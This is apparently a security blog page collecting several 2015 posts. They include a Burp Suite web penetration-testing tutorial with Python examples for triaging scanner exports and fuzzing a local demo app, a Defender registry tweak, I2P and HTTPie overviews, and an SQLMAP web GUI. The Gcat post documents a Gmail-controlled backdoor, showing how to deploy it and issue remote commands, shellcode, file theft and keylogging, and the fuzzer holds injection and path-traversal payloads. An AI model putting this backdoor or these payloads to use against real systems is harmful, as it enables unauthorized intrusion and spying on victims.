
Burp Suite Tutorial – Web Application Penetration Testing (Part 2)

Saturday, December 26, 2015 Sensei Fedon 0 Comments

In the last article we introduced some of the useful features that Burp Suite has to offer when performing a Web Application Penetration Test. In part 2 of this series we will explore some additional functionality including: Validating Scanner Results, Exporting Scanner Reports, Parsing XML Results, Saving a Burp Session and Burp Extensions. Let's get right to it!

Burp Suite Tutorial – Validating Scanner Results

It’s always a good idea to thoroughly validate the results of any automated scanning tool: scanners produce false positives, and a finding you cannot reproduce by hand does not belong in a report. Burp Suite provides everything you need to do this on the “Scanner/Results” tab. Click on a node in the left pane to see the identified vulnerabilities associated with that target. The right-hand lower pane displays the verbose Request/Response information pertaining to the specific vulnerability selected from the right-hand upper pane.
The “Advisory” tab contains information about the vulnerability including a high-level summary, a description and the proposed remediation. The “Request” & “Response” tabs display exactly what Burp Suite sent to the target application in order to check for the vulnerability, as well as what the application returned. Send that request to Repeater and confirm that the behaviour the advisory describes is really there before you accept the finding. Take a look at the example below.
Figure #1 – Validating Scanner Results
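The same validation can be done offline on a Burp Scanner XML export (right-click the issues in “Scanner/Results”, report them, choose XML). The Python below is an added example and is not code from the original article or from Burp; the element layout it parses (issue, host, path, severity, confidence, and a base64-encoded request/response inside CDATA) is what Burp’s XML export looks like in practice, and the sample document is constructed here to exercise the parser, not a real scan result. It decodes each request/response pair, orders the issues for manual review, and, for reflected findings, checks that the parameter value actually comes back unencoded in the response body.

```python
import base64
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the layout of a Burp Scanner XML export. Requests and responses are
# base64-encoded inside CDATA the way Burp writes them. Not real scan output.
_XSS_REQ = (b"GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1\r\n"
            b"Host: www.pentestgeek.com\r\n\r\n")
_XSS_RESP = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             b"<p>Results for <script>alert(1)</script></p>")
_COOKIE_REQ = b"GET / HTTP/1.1\r\nHost: www.pentestgeek.com\r\n\r\n"
_COOKIE_RESP = (b"HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=abc123; path=/\r\n"
                b"Content-Type: text/html\r\n\r\n<html></html>")


def _b64(data):
    return base64.b64encode(data).decode("ascii")


SAMPLE_XML = f"""<?xml version="1.0"?>
<issues burpVersion="1.6.26">
  <issue>
    <serialNumber>1</serialNumber>
    <name>Cross-site scripting (reflected)</name>
    <host ip="192.0.2.10">http://www.pentestgeek.com</host>
    <path><![CDATA[/search]]></path>
    <location><![CDATA[/search [q parameter]]]></location>
    <severity>High</severity>
    <confidence>Certain</confidence>
    <requestresponse>
      <request method="GET" base64="true"><![CDATA[{_b64(_XSS_REQ)}]]></request>
      <response base64="true"><![CDATA[{_b64(_XSS_RESP)}]]></response>
    </requestresponse>
  </issue>
  <issue>
    <serialNumber>2</serialNumber>
    <name>Cookie without HttpOnly flag set</name>
    <host ip="192.0.2.10">http://www.pentestgeek.com</host>
    <path><![CDATA[/]]></path>
    <location><![CDATA[/]]></location>
    <severity>Low</severity>
    <confidence>Tentative</confidence>
    <requestresponse>
      <request method="GET" base64="true"><![CDATA[{_b64(_COOKIE_REQ)}]]></request>
      <response base64="true"><![CDATA[{_b64(_COOKIE_RESP)}]]></response>
    </requestresponse>
  </issue>
</issues>
"""


def _decode(element):
    """Raw bytes of a <request>/<response> element, base64-decoded when Burp marked it so."""
    if element is None or element.text is None:
        return b""
    text = element.text.strip()
    return base64.b64decode(text) if element.get("base64") == "true" else text.encode("latin-1")


def parse_issues(xml_text):
    """Parse a Burp XML issue export into dicts carrying the decoded request and response."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    issues = []
    for node in root.findall("issue"):
        rr = node.find("requestresponse")
        issues.append({
            "name": node.findtext("name", ""),
            "host": node.findtext("host", ""),
            "path": node.findtext("path", ""),
            "severity": node.findtext("severity", ""),
            "confidence": node.findtext("confidence", ""),
            "request": _decode(rr.find("request")) if rr is not None else b"",
            "response": _decode(rr.find("response")) if rr is not None else b"",
        })
    return issues


def reflected_values(issue):
    """Query-string values from the issue's request that appear verbatim (unencoded) in the
    response body. A reflected XSS advisory should be backed by a non-empty result here."""
    request_line = issue["request"].split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    body = issue["response"].split(b"\r\n\r\n", 1)[-1].decode("latin-1", "replace")
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {name: value for name, values in params.items() for value in values if value and value in body}


def triage_order(issues):
    """Issues sorted for manual validation: worst severity first, then strongest confidence."""
    sev = {"High": 0, "Medium": 1, "Low": 2, "Information": 3}
    conf = {"Certain": 0, "Firm": 1, "Tentative": 2}
    return sorted(issues, key=lambda i: (sev.get(i["severity"], 9), conf.get(i["confidence"], 9)))


def summarize(issues):
    """Count issues per (severity, confidence) pair, a quick sanity check of an export."""
    return Counter((i["severity"], i["confidence"]) for i in issues)


if __name__ == "__main__":
    for issue in triage_order(parse_issues(SAMPLE_XML)):
        print(f'{issue["severity"]:<7} {issue["confidence"]:<10} {issue["name"]} at {issue["host"]}{issue["path"]}')
        print("  reflected unescaped:", reflected_values(issue) or "none")
```

Point `parse_issues` at the text of a real export and the reflected-value check tells you straight away which XSS findings are worth opening in Repeater first; Tentative-confidence issues sort to the bottom of the queue rather than being dropped, since Burp is often right about those too.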


Burp Suite Tutorial – Web Application Penetration Testing (Part 1)

Saturday, December 26, 2015 Sensei Fedon 0 Comments


Burp Suite from Portswigger is one of my favorite tools to use when performing a Web Application Penetration Test. The following is a step-by-step Burp Suite Tutorial. I will demonstrate how to properly configure and utilize many of Burp’s features. After reading this, you should be able to perform a thorough web application penetration test. This will be the first in a two-part article series.
Don’t Go To Jail!
What we will cover:
  • Outbound SOCKS Proxy Configuration
  • Intercept & Scope Configuration
  • Manual Application Walkthrough
  • Using The Spider & Discover
  • Using The Repeater Tab
  • Using The Intruder Tab
  • Text Specific Searching
  • Using The Automated Scanner
Disclaimer: Testing web applications that you do not have written authorization to test is illegal and punishable by law.

Burp Suite Tutorial – Configure Outbound SOCKS Proxy

Depending on the scope of your engagement, it may be necessary to tunnel your Burp traffic through an outbound SOCKS proxy. This ensures that testing traffic originates from your approved testing environment. I prefer to use a plain SSH dynamic port forward, which works nicely for this purpose. SSH out to your testing server and set up a SOCKS proxy on your localhost via the ‘-D’ option like this:
ssh -D 9292 -l username servername
Navigate to the Options tab located near the far right of the top menu in Burp. From the “Connections” sub-tab, scroll down to the third section labeled “SOCKS Proxy”. Tick “Use SOCKS proxy”, type in localhost for the host option and 9292 for the port option. Also tick “Do DNS lookups over SOCKS proxy”, so that the target’s hostname is resolved at the far end of the tunnel rather than by your local resolver; otherwise the DNS queries for the client’s domain still leave from your own network.
Burp Suite Tutorial - SOCKS Proxy Settings
Now Burp is configured to route traffic through your outbound SSH tunnel. Configure your browser’s proxy settings to use Burp (127.0.0.1:8080 by default). Navigate to www.whatismyip.com and ensure the IP address shown is that of your testing environment; if it is still your own address, the SOCKS settings are not being applied and you should not start testing yet.
#ProTip I use a separate browser for web application testing. This ensures I don’t accidentally pass any personal data to one of my client’s sites, such as the password to my Gmail account for example.
I also prefer to use a proxy switching addon such as “SwitchySharp” for Google Chrome. This allows me to easily switch back and forth between various proxy configurations that I might need during different engagements. Here is what my configuration settings look like for Burp.
Figure #2 – SwitchySharp Proxy Settings

Burp Suite Tutorial – Configure Intercept Behavior

The next thing I do is configure the proxy intercept feature, setting it to only pause on requests and responses to and from the target site. Navigate to the “Proxy” tab and then the “Options” sub-tab. The second and third headings display the configurable options for intercepting requests and responses. Uncheck the defaults and check “URL Is in target scope”. Next, turn intercept off, as it is not needed for the initial application walkthrough: from the “Intercept” sub-tab ensure that the toggle button reads “Intercept is off”.
Figure #3 – Proxy Intercept Settings

Burp Suite Tutorial – Application Walkthrough

For some reason, a lot of people like to skip this step. I don’t recommend this. During the initial walkthrough of your target application it is important to manually click through as much of the site as possible. Try to resist the urge to start analyzing things in Burp right away. Instead, spend a good while and click on every link and view every page, just like a normal user would. Think about how the site works, or how it’s “supposed” to work.
You should be thinking about the following questions:
  • What types of actions can someone do, both from an authenticated and unauthenticated perspective?
  • Do any requests appear to be processed by a server-side job or database operation?
  • Is there any information being displayed that I can control?
If you stumble upon any input forms, be sure to do some manual test cases. Enter a single tick (') and hit submit on any search form or zip code field you come across, then look at whether the response changes: an error message, a stack trace, or a page of noticeably different length. You might be surprised at how often security vulnerabilities are discovered by curious exploration and not by automated scanning.

Burp Suite Tutorial – Configure Your Target Scope

Now that you have a good feel for how your target application works, it’s time to start analyzing some GETs and POSTs. However, before doing any testing with Burp it’s a good idea to properly define your target scope. This will ensure that you don’t send any potentially malicious traffic to websites that you are not authorized to test.
#ProTip I am authorized to test www.pentestgeek.com. *You* are not.
Head over to the “Target” tab and then the “Site map” sub-tab. Select your target website from the left display pane, right click and choose “Add to scope”. Next highlight all other sites in the display pane, right click and select “Remove from scope”. If you’ve done this correctly your scope should look something like the image below.
Figure #4 – Scope Settings

Burp Suite Tutorial – Initial Pilfering

Click on the “Target” tab and the “Site map” sub-tab. Scroll down to the appropriate site branch and expand all the arrows until you get a complete picture of your target site. This should include all of the individual pages you browsed as well as any JavaScript and CSS files. Take a moment to soak all of this in, and try to spot files that you don’t recognize from the manual walkthrough. You can view the response of each request in a number of different formats on the “Response” tab of the bottom right display pane. Browse through each response searching for interesting gems. Things you might be surprised to find include:
  • Developer comments
  • Email addresses
  • Usernames & passwords if you’re lucky
  • Path disclosure to other files/directories
  • Etc…

Burp Suite Tutorial – Search Specific Keywords

You can also leverage burp to do some of the heavy lifting for you. Right click on a node, from the “Engagement tools” sub-menu select “Search”. One of my favorite searches is to scan for the string “set-cookie”. This lets you know which pages are interesting enough to require a unique cookie. Cookies are commonly used by web application developers to differentiate between requests from multiple site users. This ensures that user ‘A’ doesn’t get to view the information belonging to user ‘B’. For this reason it is a good idea to identify these pages and pay special attention to them.
Figure #5 – Search Specific Keywords

Burp Suite Tutorial – Using Spider and Discover

After a good bit of manual poking and prodding it’s usually beneficial to allow Burp to spider the host. Just right click on the target’s root branch in the site map and select “Spider this host”. Bear in mind that the spider requests every link it finds, including ones that perform an action (logging you out, deleting a record), so only run it once your scope is set and you know what the application does.
Figure #6 – Spider Feature
Once the spider has finished, go back to your site map and see if you picked up any new pages. If you have, take a manual look at them in your browser and also within Burp to see if they produce anything interesting. Are there any new login prompts or input boxes, for example? If you’re still not satisfied with all that you have found you can try Burp’s discovery module. Right click on the target site’s root branch and from the “Engagement tools” sub-menu select “Discover Content”. On most sites this module can and will run for a long time, so it’s good practice to keep an eye on it. Make sure that it completes, or shut it off manually before it runs for too long.

Burp Suite Tutorial – Using The Repeater

The Repeater tab is arguably one of the most useful features in Burp Suite. I use it hundreds of times on every web application that I test. It is extremely valuable and also incredibly simple to use. Just right click on any request within the “Target” or “Proxy” tab and select “Send to Repeater”. Next click over to the “Repeater” tab and hit “Go”. You will see something like this.
Figure #7 – The Repeater
Here you can manipulate any part of the HTTP request, headers included, and see what the response looks like. I recommend spending some good time here playing with every aspect of the HTTP request, especially any GET/POST parameters that are being sent along with it.

Burp Suite Tutorial – Using The Intruder

If you are limited on time and have too many requests and individual parameters to do a thorough manual test, Burp Intruder is a really great and powerful way to perform automated, semi-targeted fuzzing. You can use it against one or more parameters in an HTTP request. Right click on any request just as we did before and this time select “Send to Intruder”. Head over to the “Intruder” tab and click on the “Positions” sub-tab. You should see something like this.
Figure #8 – Intruder Positions
I recommend using the “Clear” button to remove what is selected at first. By default Burp marks the value of every parameter (everything after an ‘=’ sign) as a payload position. Highlight the parameters you want to fuzz and click “Add”. Next, go to the “Payloads” sub-tab and tell Burp which test cases to perform during the fuzzing run. A good one to start off with is “Fuzzing – full”. This will send a number of basic test cases to every parameter that you highlighted on the “Positions” sub-tab. With the default “Sniper” attack type Burp substitutes the payloads into one position at a time, so sort the results by status code and response length: a response that differs from the baseline points at the specific parameter that reacted.
Figure #9 – Intruder Payloads
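To make concrete what a Sniper-style Intruder run (and the single-tick test from the walkthrough section) actually does, here is an added Python example; it is not code from the original article or from Burp. The target is a constructed stand-in started on localhost, with a search parameter that breaks on a single quote and a zip field that is echoed back unencoded; the payload list is a tiny slice of the kind of thing Burp’s “Fuzzing – full” set sends. The fuzzer takes a baseline, substitutes each payload into one parameter at a time while holding the others, and flags responses whose status, error text or unencoded reflection differs from that baseline.

```python
import html
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode, urlsplit
from urllib.request import ProxyHandler, Request, build_opener

# A small sample of fuzzing payloads (constructed here; Burp's own lists are far longer).
PAYLOADS = ["'", '"', "<x>", "../../etc/passwd", "1 OR 1=1"]

# Talk to localhost directly even if an http_proxy variable is set in the environment.
_OPENER = build_opener(ProxyHandler({}))


class _DemoApp(BaseHTTPRequestHandler):
    """Constructed stand-in for a target application (an assumption, not a real site): the q
    parameter is concatenated into a SQL query and breaks on a single quote, and the zip
    field is echoed back into the page without encoding."""

    def do_GET(self):
        params = parse_qs(urlsplit(self.path).query, keep_blank_values=True)
        q = params.get("q", [""])[0]
        zip_code = params.get("zip", [""])[0]
        if "'" in q:
            self._send(500, f"Error: You have an error in your SQL syntax near '{q}'")
        else:
            self._send(200, f"<p>Results for {html.escape(q)} in {zip_code}</p>")

    def _send(self, status, body):
        data = body.encode("utf-8")
        self.send_response(status)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo server quiet
        pass


def start_demo_app():
    """Start the stand-in target on a free localhost port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), _DemoApp)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def fetch(url):
    """GET a URL and return (status, body) without raising on 4xx/5xx responses."""
    try:
        with _OPENER.open(Request(url), timeout=5) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def fuzz(base_url, path, params, payloads=PAYLOADS):
    """Sniper-style run: substitute each payload into one parameter at a time, keep the
    others at their baseline values, and report responses that differ from the baseline."""
    baseline_status, _ = fetch(f"{base_url}{path}?{urlencode(params)}")
    findings = []
    for name in params:
        for payload in payloads:
            mutated = dict(params, **{name: payload})
            status, body = fetch(f"{base_url}{path}?{urlencode(mutated)}")
            reasons = []
            if status != baseline_status:
                reasons.append(f"status {baseline_status} -> {status}")
            if "sql syntax" in body.lower():
                reasons.append("database error message in response")
            # Only payloads containing HTML-significant characters can show unsafe reflection.
            if html.escape(payload) != payload and payload in body:
                reasons.append("payload reflected without encoding")
            if reasons:
                findings.append({"param": name, "payload": payload, "status": status, "reasons": reasons})
    return findings


if __name__ == "__main__":
    server, base = start_demo_app()
    try:
        for f in fuzz(base, "/search", {"q": "shoes", "zip": "90210"}):
            print(f'{f["param"]}={f["payload"]!r}: {", ".join(f["reasons"])}')
    finally:
        server.shutdown()
        server.server_close()
```

Against the stand-in, the single quote in q produces a 500 with a database error while the same quote in zip produces nothing more than an unencoded echo, which is exactly the kind of per-parameter difference you read off Intruder’s results table by sorting on status and length.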

Burp Suite Tutorial – Automated Scanning

The last thing that I do when testing a web application is perform an automated scan using Burp. Back on your “Site map” sub-tab, right click on the root branch of your target site and select “Passively scan this host”. This will analyze every request and response that you have already generated during your Burp session and produce vulnerability advisories on the “Results” sub-tab of the “Scanner” tab. I like to do the passive scan first because it doesn’t send any traffic to the target server. Alternatively, you can configure Burp to passively analyze requests and responses automatically in the “Live scanning” sub-tab. You can also do this for active scanning, but I do not recommend it: live active scanning fires attack payloads at every in-scope request as you browse, including requests you have not yet looked at.
When doing an active scan I like to use the following settings.
Figure #10 – Active Scan Settings

Burp Suite Tutorial – End Of Part1

Hopefully you’ve learned some useful techniques for performing Web Application Penetration Testing. In Part 2, we will go over some more of Burp’s features. We will cover reporting and exporting session data for collaboration with other pentesters. I look forward to seeing you there. Thank you for reading and as always, Hack responsibly.
Source: pentestgeek.com


An easy Registry hack in Windows Defender makes it a efficient adware killer

Sunday, December 20, 2015 Sensei Fedon 0 Comments


Windows Registry hack can make your Windows Defender a super adware killer

Everyone, me included, hates adware. It is the worst unwanted critter of any operating system, especially Windows 7/8.1 or the newly released Windows 10. Though there are several trusted apps to remove such malware, it is always better to have a native application that can nip such adware in the bud.
Yesterday Microsoft announced that its enterprise security products come with a new feature that also stops potentially unwanted software and adware. The functionality was first made available to enterprises: to protect them against unwanted applications, Microsoft added a new opt-in feature to its enterprise solutions System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP). Combined with Windows Defender, these applications are able to block the download and installation of unwanted software. With the feature enabled, Windows Defender also detects and removes potentially unwanted applications (PUAs), such as the adware that piggybacks on freeware installers.
However, this was only for enterprises and businesses. Luckily for us, the German website Heise has discovered that tweaking the Windows Defender entry in the Windows Registry turns it into a potent adware killer for everyone. Windows Defender is Microsoft’s built-in security solution, available on all systems since Windows 8, and it can be considered the successor to Microsoft Security Essentials.
Easy registry hack makes Windows Defender an adware killer (image courtesy Heise)

How to go about it

Heise has discovered that, using a registry hack, it is also possible for consumers to get the additional protection. According to Heise the hack works in Windows 7, Windows 8.1 and Windows 10, Home and Pro versions. Once you have made the change to your registry, Defender can kill the adware.

How To Open Registry Editor

  1. In Windows 10 or Windows 8.1, right-click or tap-and-hold the Start button and then choose Run. Prior to Windows 8.1, Run is most easily available from the Apps screen. In Windows 7 or Windows Vista, click on Start. In Windows XP, click on the Start button and then click Run….
  2. In the search box, or Run window, type the following:
    regedit
    and then press Enter.
    Note: Depending on your version of Windows, and how it’s configured, you may see a User Account Control dialog box where you’ll need to confirm that you want to open Registry Editor.
  3. Registry Editor will open.
To activate the adware-killer feature in Windows Defender, create the key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine (the Policies branch normally does not contain it yet, so create the missing keys on the way down) and inside it a DWORD value named MpEnablePus with the value 1.
Alternatively, save the text below as a file named defender.reg and double-click it; Registry Editor will ask for confirmation and then import the value. The quotes must be plain ASCII double quotes: curly quotes pasted from a word processor will make the import fail.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine]
"MpEnablePus"=dword:00000001
Do remember to back up your Registry before embarking on this hack (File > Export in Registry Editor). Also, kindly do it at your own risk.


I2P - The Invisible Internet Project

Monday, September 28, 2015 Sensei Fedon 0 Comments


I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).

How does it work?

To anonymize the messages sent, each client application has its I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of its outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end-to-end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.
The first time a client wants to contact another client, they make a query against the fully distributed "network database" - a custom structured distributed hash table (DHT) based off the Kademlia algorithm. This is done to find the other client's inbound tunnels efficiently, but subsequent messages between them usually include that data so no further network database lookups are required.

What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.
I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.
I2P is not inherently an "outproxy" network - the client you send a message to is the cryptographic identifier, not some IP address, so the message must be addressed to someone running I2P. However, it is possible for that client to be an outproxy, allowing you to anonymously make use of their Internet connection. To demonstrate this, the "eepproxy" will accept normal non-I2P URLs (e.g. "http://www.i2p.net") and forward them to a specific destination that runs a squid HTTP proxy, allowing simple anonymous browsing of the normal web. Simple outproxies like that are not viable in the long run for several reasons (including the cost of running one as well as the anonymity and security issues they introduce), but in certain circumstances the technique could be appropriate.
The I2P development team is an open group, welcome to all who are interested in getting involved, and all of the code is open source. The core I2P SDK and the current router implementation is done in Java (currently working with both sun and kaffe, gcj support planned for later), and there is a simple socket based API for accessing the network from other languages (with a C library available, and both Python and Perl in development). The network is actively being developed and has not yet reached the 1.0 release, but the current roadmap describes our schedule.



TeemIp – IP Address Management Solution

Monday, September 28, 2015 Sensei Fedon 0 Comments


TeemIp is an open source, web-based IP Address Management (IPAM) tool that provides comprehensive IP management capabilities. It allows you to manage your IPv4 and IPv6 spaces through a simple and powerful user interface: track user requests, allocate IPs, and manage your IP plan and your subnet space in accordance with best-in-class IP management practices. At the same time, its CMDB allows you to manage your IT inventory and to link your CIs to the IPs they use.
TeemIp can be installed as a standalone application (default download) or as an additional module of open source iTop product (ITSM & CMDB OpenSource): http://sourceforge.net/projects/itop.

Features

  • IPv4 and IPv6 Registration
  • IPv4 and IPv6 Subnet & Range Management – Subnet calculator
  • IPv4 and IPv6 Plans Management with nesting capabilities
  • Delegation of IP space from parent to child organizations
  • Capacity Planning
  • Extended and customizable CMDB
  • Enhanced linkage capabilities between IPs and network devices or systems
  • Management of VLANs, DNS Domains, WAN Links, AS Numbers, VRFs…
  • Helpdesk & User Portal
  • Proactive mail Notifications on capacity thresholds
  • CSV import tool for all data
  • Consistency audit to check data quality
  • Multi Customer Environment supporting overlapping IP spaces
  • Data synchronization (data federation)
  • History on all data
  • … on top of iTop’s powerful engine.
Check the online demo of TeemIp  at:
http://www.combodo.com/TeemIp-online-demo.html


Gcat - A stealthy Backdoor that uses Gmail as a command and control server

Monday, September 28, 2015 Sensei Fedon 0 Comments


A stealthy Python based backdoor that uses Gmail as a command and control server.
Setup
For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using PyInstaller.
Usage
Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
  • Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)


SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP

Monday, September 28, 2015 Sensei Fedon 0 Comments


PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!
Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005


Demo against: Linux (CentOS), Apache, MySQL, PHP


Requirements:
  • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
    • PHP 5.3+ is suggested; older versions are not tested, so mileage may vary
  • Python and any SQLMAP dependencies (refer to their wiki for any help there)
  • Clone this repo to your machine
    • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
    • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
    • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
    • Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)


HTTPie - a CLI, cURL-like tool for humans

Monday, September 28, 2015 Sensei Fedon 0 Comments


HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage
Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects of the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123
$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example, :3000 would expand to http://localhost:3000. If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1



Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing

Monday, September 28, 2015 Sensei Fedon 0 Comments


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
